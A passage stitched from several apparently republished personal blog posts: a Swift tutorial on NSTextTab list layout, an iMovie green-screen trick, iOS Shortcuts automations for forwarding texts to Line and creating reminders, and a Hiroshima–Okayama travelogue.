setting for child items will be ignored.What NSTextList can do and what it can be used for is as described above. However, it is not very user-friendly in practical product development applications; the spacing is too wide, numeric items lack .
, greatly reducing usability. Online, I only found a way to change the spacing through TextKit NSTextStorage, which I think is too hard-coding, so I abandoned it. The only benefit is that it allows for simple nesting of indented sub-item lists by appending textLists arrays, without the need for complex layout calculations.
NSTextTab allows us to set the position of the \t
tab placeholder, with a default interval of 28
.
We achieve a list-like effect by setting tabStops
+ headIndent
+ defaultTabInterval
in NSMutableParagraphStyle
.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+
let textListLevel1 = NSTextList(markerFormat: .decimal, startingItemNumber: 1)
+let textListLevel2 = NSTextList(markerFormat: .circle, startingItemNumber: 1)
+
+let listLevel1ParagraphStyle = NSMutableParagraphStyle()
+listLevel1ParagraphStyle.defaultTabInterval = 28
+listLevel1ParagraphStyle.headIndent = 29
+listLevel1ParagraphStyle.tabStops = [
+ NSTextTab(textAlignment: .left, location: 8), // Corresponding settings as shown in figure (1) Location
+ NSTextTab(textAlignment: .left, location: 29), // Corresponding settings as shown in figure (2) Location
+]
+
+let listLevel2ParagraphStyle = NSMutableParagraphStyle()
+listLevel2ParagraphStyle.defaultTabInterval = 28
+listLevel2ParagraphStyle.headIndent = 44
+listLevel2ParagraphStyle.tabStops = [
+ NSTextTab(textAlignment: .left, location: 29), // Corresponding settings as shown in figure (3) Location
+ NSTextTab(textAlignment: .left, location: 44), // Corresponding settings as shown in figure (4) Location
+]
+
+let attributedString = NSMutableAttributedString()
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 1)).\tList Level 1 - 1 StringStringStringStringStringStringStringStringStringStringStringString\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 2)).\tList Level 1 - 2\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 3)).\tList Level 1 - 3\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel2.marker(forItemNumber: 1))\tList Level 2 - 1\n", attributes: [.paragraphStyle: listLevel2ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel2.marker(forItemNumber: 2))\tList Level 2 - 2 StringStringStringStringStringStringStringStringStringStringStringString\n", attributes: [.paragraphStyle: listLevel2ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 4)).\tList Level 1 - 4\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+
+textView.attributedText = attributedString
+
tabStops
array corresponds to each \t
symbol in the text. NSTextTab
can be set with Alignment direction and Location position (please note that it is not setting the width, but the position in the text!).headIndent
sets the position from the starting point for the second line, usually set to the Location of the second \t
, so that line breaks align with the item symbol.defaultTabInterval
sets the default interval spacing for \t
. If there are other \t
in the text, they will be spaced according to this setting.location:
Because NSTextTab specifies direction and position, you need to calculate the position yourself. You need to calculate the width of the item symbol (the number of digits also affects) + spacing + indentation distance within the parent item to achieve the effect shown in the figure above.location
is incorrect or cannot be met, there will be direct line breaks.The example above is simplified to help you understand the layout of NSTextTab
. The calculation and summarization process is simplified, and the answer is written directly. If you want to use it in a real scenario, you can refer to the following complete code:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+
let attributedStringFont = UIFont.systemFont(ofSize: UIFont.systemFontSize)
+let iterator = ListItemIterator(font: attributedStringFont)
+
+//
+let listItem = ListItem(type: .decimal, text: "", subItems: [
+ ListItem(type: .circle, text: "List Level 1 - 1 StringStringStringStringStringStringStringStringStringStringStringString", subItems: []),
+ ListItem(type: .circle, text: "List Level 1 - 2", subItems: []),
+ ListItem(type: .circle, text: "List Level 1 - 3", subItems: [
+ ListItem(type: .circle, text: "List Level 2 - 1", subItems: []),
+ ListItem(type: .circle, text: "List Level 2 - 2 fafasffsafasfsafasas\tfasfasfasfasfasfasfasfsafsaf", subItems: [])
+ ]),
+ ListItem(type: .circle, text: "List Level 1 - 4", subItems: []),
+ ListItem(type: .circle, text: "List Level 1 - 5", subItems: []),
+ ListItem(type: .circle, text: "List Level 1 - 6", subItems: []),
+ ListItem(type: .circle, text: "List Level 1 - 7", subItems: []),
+ ListItem(type: .circle, text: "List Level 1 - 8", subItems: []),
+ ListItem(type: .circle, text: "List Level 1 - 9", subItems: []),
+ ListItem(type: .circle, text: "List Level 1 - 10", subItems: []),
+ ListItem(type: .circle, text: "List Level 1 - 11", subItems: [])
+])
+let listItemIndent = ListItemIterator.ListItemIndent(preIndent: 8, sufIndent: 8)
+textView.attributedText = iterator.start(item: listItem, type: .decimal, indent: listItemIndent)
+
+
+
+//
+private extension UIFont {
+ func widthOf(string: String) -> CGFloat {
+ return (string as NSString).size(withAttributes: [.font: self]).width
+ }
+}
+
+private struct ListItemIterator {
+ let font: UIFont
+
+ struct ListItemIndent {
+ let preIndent: CGFloat
+ let sufIndent: CGFloat
+ }
+
+ func start(item: ListItem, type: NSTextList.MarkerFormat, indent: ListItemIndent) -> NSAttributedString {
+ let textList = NSTextList(markerFormat: type, startingItemNumber: 1)
+ return item.subItems.enumerated().reduce(NSMutableAttributedString()) { partialResult, listItem in
+ partialResult.append(self.iterator(parentTextList: textList, parentIndent: indent.preIndent, sufIndent: indent.sufIndent, item: listItem.element, itemNumber: listItem.offset + 1))
+ return partialResult
+ }
+ }
+
+ private func iterator(parentTextList: NSTextList, parentIndent: CGFloat, sufIndent: CGFloat, item: ListItem, itemNumber:Int) -> NSAttributedString {
+ let paragraphStyle = NSMutableParagraphStyle()
+
+
+ // e.g. 1.
+ var itemSymbol = parentTextList.marker(forItemNumber: itemNumber)
+ switch parentTextList.markerFormat {
+ case .decimal, .uppercaseAlpha, .uppercaseLatin, .uppercaseRoman, .uppercaseHexadecimal, .lowercaseAlpha, .lowercaseLatin, .lowercaseRoman, .lowercaseHexadecimal:
+ itemSymbol += "."
+ default:
+ break
+ }
+
+ // width of "1."
+ let itemSymbolIndent: CGFloat = ceil(font.widthOf(string: itemSymbol))
+
+ let tabStops: [NSTextTab] = [
+ .init(textAlignment: .left, location: parentIndent),
+ .init(textAlignment: .left, location: parentIndent + itemSymbolIndent + sufIndent)
+ ]
+
+ let thisIndent = parentIndent + itemSymbolIndent + sufIndent
+ paragraphStyle.headIndent = thisIndent
+ paragraphStyle.tabStops = tabStops
+ paragraphStyle.defaultTabInterval = 28
+
+ let thisTextList = NSTextList(markerFormat: item.type, startingItemNumber: 1)
+ //
+ return item.subItems.enumerated().reduce(NSMutableAttributedString(string: "\t\(itemSymbol)\t\(item.text)\n", attributes: [.paragraphStyle: paragraphStyle, .font: font])) { partialResult, listItem in
+ partialResult.append(self.iterator(parentTextList: thisTextList, parentIndent: thisIndent, sufIndent: sufIndent, item: listItem.element, itemNumber: listItem.offset + 1))
+ return partialResult
+ }
+ }
+}
+
+private struct ListItem {
+ var type: NSTextList.MarkerFormat
+ var text: String
+ var subItems: [ListItem]
+}
+
ListItem
object to encapsulate sub-list items, combining them recursively and calculating the spacing and content of the item list.NSTextList
only uses the marker
method to generate list symbols, but it can also be implemented independently without using it.preIndent
and sufIndent
.Font
to calculate width, make sure to set .font
for the text to ensure accurate calculation.Initially, we hoped that we could achieve the desired effect directly using NSTextList, but the result and customization level were both poor. In the end, we had to rely on a makeshift solution with NSTextTab, controlling the position of \t
to manually combine item symbols. It’s a bit cumbersome, but the effect perfectly meets the requirements!
The goal has been achieved, but I still haven’t fully mastered the knowledge of
NSTextTab
(for example, different directions? Relative positions of Location?). The official documentation and online resources are too scarce. I’ll study it further if I have the chance.
A tool to help you convert HTML strings to NSAttributedStrings, with support for custom style assignment and custom tag functionality.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Using iMovie’s green screen keying feature to composite videos
Recently, while mindlessly relaxing, I came across a very common wallpaper app advertisement that showcased an eye-catching transparent perspective wallpaper; but it’s obviously impossible, even if the rear camera was capturing the scene in real-time, the angles wouldn’t match so perfectly!
Although I knew it was a special effect, I thought it would be very complicated; unexpectedly, the built-in iMovie app on the iPhone can easily create it with a few taps.
You can download this image directly or get it from the internet
These 5 items can create a perspective effect!
I used two eel cans and a bottle of mineral water as a phone stand (a vertical phone stand would be even better!)
The purpose of using a phone stand is to ensure that the angles of the two videos are consistent. Otherwise, there will be a shift in the frame, and the effect won’t look as good. It’s impossible to hold the phone and have the angles of both videos be 100% the same.
Shoot the clean video as long as you want the final video to be.
“Settings” -> “Wallpaper” -> “Choose the downloaded green screen” -> “Set Both”
Finished image
The length of the video should be the same as the clean video; it’s okay if it’s longer, you can trim it later.
“+” -> “Movie” -> Select “Clean Video” -> “Create Movie”
Insert the clean video into the project.
If you don’t move the playhead to the beginning of the clean video, you will see the message “Move the playhead away from the end to add overlay” when inserting the green screen video.
Click the top right “+” -> “Video” -> “All”
Select “Phone Operation Video” -> “…” -> “Green/Blue Screen” (commonly known as: Chroma Key)
Click the top “Phone Operation Video” -> Scroll to the frame with the green screen -> Click the “Green Area” -> Complete the perspective transparency
Confirm that the end times of the two videos are consistent, click “Done” in the upper left corner -> “Share” at the bottom -> Select the output target -> Output complete
Just for fun… I didn’t expect iMovie to be so powerful!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
iOS uses Shortcuts to easily automate forwarding specific text messages to Line and automatically create reminders for parcel collection and credit card payment
Photo by Jakub Żerdzicki
Shortcuts (formerly Workflow) is a new feature introduced in iOS 12; it allows users to create a series of tasks to be executed with a single tap and set to run automatically in the background.
In addition to the built-in Shortcuts feature in iOS, Apple has also opened up Siri Shortcuts / App Intents to developers in recent years, allowing third-party apps to integrate some functions into Shortcuts for users to combine.
The automatic execution conditions are currently limited to iOS itself or Apple’s own apps, such as specific times, arrival, departure from a location, NFC detection, receiving messages, emails, or connecting to Wi-Fi, battery level, Do Not Disturb mode, sound detection, and more.
For Apple’s own services, there is no need to jailbreak as in the early days of forwarding text messages; Shortcuts function without jailbreaking and without installing strange third-party apps.
There is already a lot of content online introducing how to use Shortcuts and providing ready-made scripts, so this article will not go into detail.
The message forwarding feature across iOS devices (Settings -> Messages -> Message Forwarding) requires devices with the same Apple ID, so we need to use Shortcuts to help us forward specific messages.
This article only introduces three practical, convenient, and simple application scenarios.
In this era of rampant scam text messages, we are afraid that elderly family members or children at home may receive scam messages and inadvertently provide information to scammers, or that elderly family members may not understand the process of receiving text message verifications for account security and need remote assistance to complete the verification; we also fear that children may use their phones to do things that are not allowed.
https://branch.taipower.com.tw/d112/xmdoc/cont?xsmsid=0M242581319225466606&sid=0N209616847897374705
Conditions are set as follows:
Even in standby mode without unlocking the phone, the forwarding can be executed correctly.
http
( =All text messages with URLs will be forwarded ) Create separate shortcuts for multiple keywords.When - Other Settings:
If only the last four conversation partners or groups appear here, and if the desired target does not appear, you can go back to Line and send a few messages to the target, then come back and it will appear.
Selecting contacts’ phone numbers in Line to send messages is not effective.
After adding the recipient
To change the recipient to XXX, you need to click on the right X to remove the entire Line action, then add the Line Send Message action again with the new recipient.
When I receive a message containing "XXX", treat the message as input, Line will send "content" to "XXX"
Just wait for new text messages to come in, and if they contain the specified keywords, they will be automatically forwarded (even if the phone is not unlocked). Due to current functionality limitations, a separate shortcut needs to be created for each keyword, and if the same text message contains different keywords, it will be sent twice.
I currently use Apple’s built-in Reminders as a tool for managing daily tasks, so I also want to integrate things that need to remind me, such as package arrival at convenience stores, credit card payment notifications, etc.
Setting conditions as follows:
Similar to the conditions set for automatically forwarding text messages in the previous section, here set Message content contains "送達"
and change to "Run Immediately"
.
First, we need to set the due date for the reminder task, add a date variable, calculate the time starting from when the message is received + the desired reminder time.
Add a new blank automation action
Adjust Date
Adjust Date
Date to add 0 seconds to
, select Current Date
Add 0 "seconds"
, change to days
in the input box for seconds
Reminder
, scroll down and click on Add Reminder
After adding “Add Reminder”,
Reminder
input box under Add "Reminder" to "Reminders" without prompting
Shortcut Input
Add "Shortcut Input" to "Reminders" without prompting
in the Shortcut Input
input boxMessage
to Content
"Do not remind"
to "Remind"
"2:00 PM"
in the input box next to "2:00 PM"
, choose the variable "Adjusted Date"
After everything is okay, click “Done” in the top right corner If clicking “Done” does not respond, it may be an iOS bug. You can ignore it and directly click “Back” to return to the home page.
As mentioned earlier, just wait for a new text message to come in. If it contains the specified keywords, a reminder will be automatically created (even if the phone is not unlocked). Due to current limitations, a separate shortcut needs to be created for each keyword. If the same text message contains different keywords, two reminders will be created.
Another useful notification is for credit card bill notifications. Similar to text messages, you can trigger a shortcut automation to add a reminder task when receiving an email. However, since automation functions are not yet available to third-party apps, you can only use the Apple Mail App to trigger it.
Setting conditions as follows:
Please note that each company has a different format. Some may call it “Credit Card E-Bill,” “Credit Card E-Statement,” and even more specific like “Credit Card XXXX Year X Month E-Bill” for Cathay Pacific.
Since Regex is not supported at the moment, text matching is the only option. As mentioned earlier, a separate shortcut needs to be created for each keyword.
Confirm “Settings” -> “Mail” -> “Accounts” -> “Fetch New Data” is set to fetch or push.
Credit Card Bill
Create multiple shortcuts for multiple keywords.Run Immediately
Additional Settings:
First, set the expiration date of the reminder, add a date variable, calculate the time when the message is received + the time interval to get the desired reminder time.
Add a blank automation action
Adjust date
Adjust date
Add 0 seconds to "date"
in the input box for date
Current date
seconds
in Add 0 "seconds"
to days
Unlike triggering message by message, email triggering is batch fetching, so as long as the batch contains emails with the keyword title, those new emails will also be brought in together.
Not sure if it’s a shortcut bug, but the result is as described.
For example: Batch fetch three emails, including a Carrefour notification email, a credit card bill email, and an Uber notification email, all three will be input as shortcuts; therefore, we need to add another step to filter out the keyword emails we want.
Pseudo Logic:
1
+2
+3
+4
+5
+6
+
for email title in emails
+ if email title.contains("credit card bill") then
+ Add reminder
+ else
+ end
+end
+
Repeat
, scroll down and click on Repeat every item
Every item in "adjusted date"
in the input box for adjusted date
, choose Clear variable
Every item in "item"
in the input box for item
, choose Shortcut input
If
, scroll down and click on If
If "Repeat Result" "Condition"
action under Every item in Shortcut Input
Repeat Result
input box of If "Repeat Result" "Condition"
, below change to select Title
, click the “X” next to the menu to closeTitle
input box of If "Title" "Condition"
, change to select Contains
, enter credit card bill
, click “Done” on the keyboardAfter adding “Add Reminder”:
Change “Do Not Notify” to “Notify”. Select “2:00 PM” in the “2:00 PM” input box, choose the variable “Adjusted Date”. Click on the “X” next to the menu to close. If there is no response after clicking “Done”, it may be an iOS bug. You can ignore it and click “Back” to return to the home screen.
You can view, pause, or modify this shortcut on the Shortcuts Automation homepage.
Setting up email is a bit more complicated because it involves batch extraction, so you need to filter again and create reminders based on the filtered results.
After the Shortcuts Automation is executed, a notification will pop up that cannot be closed.
You have now completed several basic automation integration functions, saving you daily effort with just a few simple steps. For more advanced integrations, such as API integration with Notion or more complex integrations, they can also be achieved technically. What you lack is not the technology but your imaginative automation ideas!
If you have any questions or feedback, feel free to contact me.
A new version of content is available.
6-day trip to Hiroshima, Okayama, Fukuyama, Kurashiki, and Onomichi in 2023
After resigning at the end of August and immediately embarking on a “ 10-day Solo Stroll in Kyushu “ in September for almost three months of rest, originally planning to start work in mid-November, the new job will involve new projects, and the new company does not offer much special leave. Everything needs to accumulate annual leave according to the basic labor law, so I considered going out to play again (planning started at the end of October).
Last time, on the way to an unexpected incident on the road to Nagasaki — received a souvenir from Onomichi, Hiroshima Prefecture, and visited the Nagasaki Atomic Bomb Museum and Peace Park last time, so I thought I could also visit Hiroshima.
Also, friends around me highly recommended Hiroshima, with World Heritage sites such as Itsukushima Shrine, oysters, Seto Inland Sea, Onomichi, Rabbit Island…
And since it’s a solo trip, not considering big cities or cities I’ve already been to, hoping for convenient transportation, Hiroshima is a great choice!
Originally planned to start work on 11/20 (later postponed to 12/1), deducting the last day as a buffer for rest, the return date was set for 11/18 (Saturday).
For the departure date, originally had plans with friends on 11/12, so I decided to depart on 11/13 (Monday); but since the work arrangements were flexible, mainly based on when the flight prices for the round trip were lower.
❌ The most intuitive way to go to Hiroshima is through Hiroshima Airport, but the conditions are very unfavorable:
❌ In and out of Fukuoka + Shinkansen, still inconvenient:
❌ Later found out that I could go to Hiroshima through Okayama with Tigerair, the motivation to go was average:
Since I had spent a lot during the “ 10-day Kyushu trip in September “, if I couldn’t keep the flight ticket price around 10,000, the motivation to go was not strong, so I almost gave up on this trip.
✅ Tigerair Okayama Winter Travelogue Event , Departure:
On October 31, while browsing Facebook out of boredom, I happened to see a post in the “ Japan Free Travel Discussion Group “ community where someone shared about discounted airfare promotions from an airline from 11/3 10:00 to 11/6 23:59. Luckily, with a go-with-the-flow attitude, I decided to go if I could get a discount and let it go if not.
11/3 I was very lucky to buy the tickets early in the morning, with the best departure and return dates (11/13–18), the best flight times, and the best prices, so there’s no reason not to go!
After buying the tickets, there is only one week left before departure, so I will start preparing eagerly.
The places I most want to visit are Miyajima, Onomichi, Kurashiki, and Okayama Castle; so I will use Hiroshima as a base, stay there for several days, and then stay around Okayama closer to the return date.
JR Pass Okayama & Hiroshima & Yamaguchi Area Rail Pass (¥ 17,000, just in time for the price increase after the end of October 2023.)
Checking the fare from Okayama to Hiroshima station, one way is ¥6,460, round trip is ¥12,920; adding trips to Miyajima, Onomichi, and Kure… round trip, it should be worth it; buying the JR Pass directly is the most convenient option.
Toyoko Inn Hiroshima Station Baseball Stadium Front (3 nights)
Toyoko Inn consistently offers great value for money, with both price and environment being the best of this accommodation.
APA Hotel Hiroshima Ekimae Ohashi (1 night)
Since Toyoko Inn was fully booked for four nights, I could only stay at APA Hotel for one night.
Livemax Okayama Kurashiki Ekimae Hotel Livemax (1 Night)
We ended up in Kurashiki because we couldn’t find any affordable hotels in Okayama when looking for accommodation. We had to look along the JR line, as there are shuttle buses from Kurashiki back to Okayama Airport; so we decided to find a hotel near Kurashiki.
This was the only hotel in Kurashiki with available rooms, convenient location, and acceptable prices.
Original plan:
Okunoshima Island is too far and inconvenient, so it’s just on the reference list.
Departure at 11:10 in the morning, slowly getting ready to leave.
From Taipei Main Station, take the airport MRT to Terminal 1 of Taoyuan Airport, arriving at the check-in counter around 08:50.
Not many people, quickly completed check-in + departure; not much to eat at Terminal 1, bought a snack and coffee and headed to the boarding gate.
Not very hungry while waiting, so didn’t buy any snacks.
Departed at 11:07, arrived at OKJ (Okayama Momotaro Airport) at 14:11; felt hungry in between but found out that Tigerair doesn’t allow bringing your own food on board (Peach Aviation doesn’t have specific regulations), so patiently waited, planning to eat before entering the country.
Okayama Airport is super small, followed the crowd and went straight through immigration, no corner to sneakily eat; because the snack had chicken, worried about quarantine issues, so handed the whole package over to customs for disposal.
Completed immigration + baggage claim around 14:40 (super fast). Later checked the flight schedule, Okayama Airport has very few flights, maybe only one international flight a day, so there were very few people, only those on the same flight; customs and quarantine dogs checked each person, but it was still very quick!
Immediately took the airport shuttle bus upon exiting, probably due to the limited flight schedule, the shuttle to Okayama Station was scheduled for 16:10; but there was an extra shuttle waiting outside the airport (departing when full, with another one following soon), very thoughtful to save everyone time!
After getting off, found the escalator to go up to Okayama Station, first went to exchange for the JR Pass, found the machine in green with “ EXPRESS Reservation, 5489 Pick-up “ written next to it to exchange for the JR Pass ticket.
I found exchange tutorial on the internet, which says to click on the blue “予約したきっぷのお受取り” button. However, when following the steps and scanning the QR Code, an “Invalid QR Code” error keeps appearing. Even trying to enter the order number failed.
Finally, after several attempts by a group of Taiwanese people, it was discovered that you need to use the yellow button “ QRコードの読取り “ at the bottom left to exchange, and after clicking it, you can directly scan the QR Code. (Guess JR machines have been updated)
The machine will dispense two instruction sheets, one JR Pass ticket (the one with the checkmark in the image). You can also complete the seat reservation after receiving the JR Pass. Remember to use the JR Pass ticket for entering and exiting the stations, as the reserved ticket is only for reference for seat and time and cannot be used for station access.
Feeling very hungry and not having eaten anything, I first went to a convenience store to buy something to eat. I then bought a few JR tickets for the upcoming trains.
Arrived at Hiroshima Station around 16:45.
First, I checked in at the hotel to drop off my luggage before going out to find food. This road is quite deserted when there are no baseball games. On the opposite side is the railway, and there aren’t many shops along the road, but fortunately, there is a large street shop, Lawson.
Returned to the station in Hiroshima to eat Hiroshima-style okonomiyaki at “Hiroshima Okonomiyaki Story Station Square,” located on the 6th floor to the right after exiting Hiroshima Station (next to Ekie department store). As soon as you step out of the elevator, you’ll find it quite unique as the entire floor is filled with Hiroshima-style okonomiyaki restaurants, allowing you to choose your preferred restaurant to dine in.
Ordered a Hiroshima-style okonomiyaki with added rice cakes (fried noodles inside). The taste was average, with noodles and rice cakes inside, and I felt quite full after eating.
Bought a late-night snack on the way back to the hotel. The night in Hiroshima was quite cold at around 4 degrees.
Unpacked in the room.
When you pull back the curtains, you can see the railway outside (about 10 lines, so you need to be quick when crossing the level crossing); the downside of the room is that there is a knocking sound when the train passes by.
This time I brought the Allite A1 65W Gallium Nitride Fast Charger + Allite Liquid Silicone Fast Charging Cable combination for the trip. Since switching to iPhone 15, almost all devices have switched to Type-C ports; when traveling, just bring a Type-C charging cable to solve everything.
The Allite A1 65W Gallium Nitride Fast Charger supports single-port 65W, dual-port 45W+18W fast charging; it is small in size and can be carried around. When you see a rechargeable plug outdoors, just plug it in to continue charging; back at the hotel, one port charges the power bank, and the other charges the phone, watch, iPad, or Switch, making it convenient and fast.
The Allite Liquid Silicone Fast Charging Cable (1.5m) is long enough to be directly connected from the power bank in the bag for use. The liquid silicone material is different from regular plastic, not only skin-friendly but also easier to bend for storage without deformation.
The best charging companion for this trip.
KKday itinerary reference:
_[Japan. Miyajima Momijidani Park, Itsukushima Shrine Rickshaw Experience](https://www.kkday.com/zh-tw/product/22395-miyajima-private-tour-ebisuya-rickshaw-experience?cid=19365&ud1=31b9b3a63abc){:target=”blank”}
In the early morning, take the JR to Miyajima-guchi Station, and walk towards the pier after exiting the station to find the ferry terminal. JR Pass includes the Miyajima ferry ticket, so there’s no need to buy a separate ticket, but you need to pay the Miyajima visit tax (¥100), and station staff will guide you to purchase the tax ticket.
Alternatively, you can also take the Hiroden to Miyajima-guchi, but I remember it takes longer.
The ferry takes about 10 minutes to reach Miyajima, and the ferry ride is smooth without a diesel smell. You can see the floating torii gate from afar as you approach!
Upon arriving on the island, head towards the floating torii gate. It’s beautiful and less crowded to take photos along the shore.
There are also many wild deer on the island, be careful as they might nibble on things XD.
After passing through Itsukushima Shrine, head to the Miyajima Ropeway to the Shishiiwa Observatory.
You need to take two cable cars to reach the Shishiiwa Observatory. The advantage of taking the cable car directly is that there are almost no people (lots of people at Itsukushima Shrine below). The first section is a small cable car for up to 6 people (frequent departures, longer distance), and the second section is a larger cable car (if I remember correctly, it departs every 15 minutes and can accommodate more people, about 20 people, with a short distance).
From the mountaintop, you can overlook the entire Seto Inland Sea, enjoy the breeze, and admire the small islands.
Itsukushima Shrine is built directly by the sea, with clean water and a serene atmosphere. You can also queue to take photos of the torii gate in the sea from the front.
During this season, the tide recedes at 3 am or 5 pm. Unfortunately, this time I didn’t have the chance to see the Itsukushima Shrine and torii gate at low tide.
For lunch, of course, you must eat oysters. The oyster rice and fried oysters at Oyster House cost around 300 TWD each, delicious and affordable, a feast of oysters!
Miyajima Ropeway and Itsukushima Shrine tickets.
Bought a small Itsukushima Shrine torii gate to take home, very cute!
Returned to Hiroshima city in the afternoon and visited the Atomic Bomb Dome and Peace Memorial Park.
In autumn, Hiroshima is adorned with the yellow of ginkgo trees, the red of maple leaves, and some green leaves, accompanied by the cool autumn breeze, reminiscing about everything that happened in Hiroshima.
Encountered many Japanese middle and elementary school outdoor classes at the Peace Memorial Park, with teachers explaining the history. I deeply feel the importance the Japanese people place on passing down historical education.
Returned to the hotel in the late afternoon to rest because it was too cold outside as I was dressed lightly.
Dinner was bought directly on the way back to the hotel from the “Charcoal Grilled Meat Min Sarumonkey Bridge Store” takeout barbecue box; what initially caught my eye about this store was that there were several charcoal stoves placed at the entrance, which felt very warm as I walked by. When I stopped to look at the sign, I found out they offered takeout boxes, so I went in!
Another interesting thing was that their meal box had a self-heating function. When you want to eat it back at the hotel, you just pull a string, and it will start heating itself, emitting hot steam; it feels freshly baked and warm whenever you eat it, very thoughtful.
Today’s convenience store late-night snack included hot dogs, fried chicken, Strong Zero, and also bought a bottle of Yakult Y1000, which is said to help you sleep well after drinking. (But I was already very sleepy today after walking all day)
In the morning, took the Shinkansen to Mihara, then transferred from Mihara to Onomichi Station.
Didn’t time it well, had to wait for over 30 minutes when transferring from Mihara to Onomichi.
Walked out of the south exit to the main entrance of Onomichi Station.
The weather was good and the temperature was comfortable, so after leaving Onomichi Station, I walked straight to Senkoji Temple; walking on the mountain side felt like walking in Jiufen Old Street, the path was not easy to walk, with many stairs and steep slopes, but on the other side, you could see the Seto Inland Sea, the scenery was nice.
Another option is to walk directly on the main road until you see the sign for the Senkoji Ropeway, then turn in and take the ropeway up to Senkoji.
The view from Senkoji Temple is great, overlooking the entire Onomichi city area and the distant Onomichi Ohashi Bridge.
Brought home a cute little Jizo statue (you can choose to write down a wish and leave it at Senkoji for offering or take it home as a souvenir):
After visiting Senkoji Temple, walking down leads to the Cat Alley.
Early internet articles often introduced the Cat Alley in Japan’s Hou Tong, but this year’s actual visit felt different; the Cat Alley is a small path downhill from Senkoji, didn’t see any stray cats, the cat cafes along the way were almost all closed, walking down felt a bit lonely, finally found a coffee shop that was still open, “Bouquet D’arbre,” to have a cup of coffee and take a break.
Tomo-no-Ura Beach is now just a quiet stretch of sand, with only the occasional sound of a group of sea ducks playing. (It’s my first time seeing saltwater ducks, not saltwater chickens.)
After about 15 minutes, with nowhere else to go, we waited for the ferry back; although the place was desolate, there were vending machines! On the way back, we took a closer look at Benten Island in the distance, a small island with a torii gate standing alone in the middle of the sea.
Returning to Tomo-no-Ura as evening approached, we strolled to the harbor to see the evening lights and the Japanese-style castle town scenery. On the way, many people and photography enthusiasts were already sitting on the steps near the harbor, setting up their cameras, waiting for the sunset.
Tomo-no-Ura is famous for its invigorating and life-saving liquor, with a strong medicinal wine aroma on the road; because we had to rush back to Hiroshima, we took a bus back to Fukuyama before it got dark.
After returning to Fukuyama, we hopped on the train to Hiroshima, bidding farewell to this peaceful and serene city. For dinner, we bought a takeout barbecue box from “ Yakiniku Toshi Saruhashi Store “ on the way back to the hotel.
Also added two fried oysters from the convenience store (only 100 yen each).
Late-night snack was still over Y1000 at the convenience store.
Early in the morning, we checked out of Toyoko INN and headed to Hiroshima APA Hotel where we would stay that night.
After storing our luggage, we walked back to Hiroshima Station to catch a train to Kure (about 50 minutes). As we approached Kure, looking out the right window felt like taking the train back to Fulung, Yilan, with mountains on the left and the sea on the right, a pleasant view.
Upon exiting the station, you can visit the tourist information center to get a travel guide for Kure. (The design is really good!)
Following the signs, you can walk from the station to the Yamato Museum and the Maritime Self-Defense Force Kure Museum.
When you’re at the end of the bridge, don’t rush to descend. From the bridge, you can get a good view of the Maritime Self-Defense Force Wushi Archives - Submarine.
For future friends planning to visit Wushi and Hiroshima, Wushi can also take a boat to Miyajima and return to Hiroshima. I originally wanted to take a boat back to Hiroshima, but I missed the time, so I gave up this time.
Inside, there is a close-up view of the Yamato battleship from almost every angle, with detailed displays of battleships, war history, fighter planes, cannons, and more. It’s a must-visit for battleship enthusiasts and military fans. Additionally, there was a special exhibition on the history and design of Japanese aircraft carriers, including design sketches.
After leaving the Yamato Museum, walk towards the back to reach the Maritime Self-Defense Force Wushi Archives, where you can enter for free.
The museum mainly showcases the living environment, working environment, engines, mines, and history inside submarines.
The most special part is that you can actually enter the submarine and see the real cockpit, dormitory, captain’s room, control room, and use the periscope to view the external environment.
After visiting the museum and approaching noon, getting ready to eat, I initially wanted to have Navy Curry directly, but after checking the reviews, it didn’t seem particularly special, so I walked back to Wushe Shopping Street to decide. (Actually quite far, in the opposite direction, took about 30 minutes to walk)
Finally chose to eat Wushe Cold Noodles, similar to cold noodles with pork bone char siu, the noodles are chilled, refreshing in taste, and the portion is quite large, so ordering a small portion is sufficient.
After eating, getting ready to head back to the station, I also bought “Fukuzumi Fried Red Bean Cake” on the way, which was sweet and oily, tasting quite ordinary; and also bought Navy Coffee and Curry as souvenirs on the way (subarucoffee_store/, the staff was very friendly and enthusiastic).
Walking back to the Wu Station and taking a train back to Hiroshima.
After returning to Hiroshima, the final tour of Hiroshima city area. There are three sightseeing bus routes available right outside Hiroshima Station (included in JR Pass), so you can choose the direction you want to go.
I want to visit Shukkeien (Hiroshima Museum) first, so I choose to take the red Maple Leaf bus.
Shukkeien is located behind the Hiroshima Museum, and you can also buy a combined ticket for Shukkeien + Hiroshima Museum when purchasing tickets.
Shukkeien is a very exquisite small garden with many miniature landscapes, such as maple leaves, flowing water under small bridges, bamboo groves, pine trees, hills, etc. It’s nice to take a walk and enjoy the scenery.
Next stop is a leisurely walk to Hiroshima Castle. The original Hiroshima Castle was destroyed in the atomic bombing, and the current Hiroshima Castle is a reconstruction. It looks very new, not very tall, and you can’t see much scenery from the main keep.
The last stop is back to the Peace Memorial Park, next to which is the Paper Crane Tower (not very tall, didn’t go in).
Just happened to encounter Shingo Takatori coming to pay his respects in the afternoon.
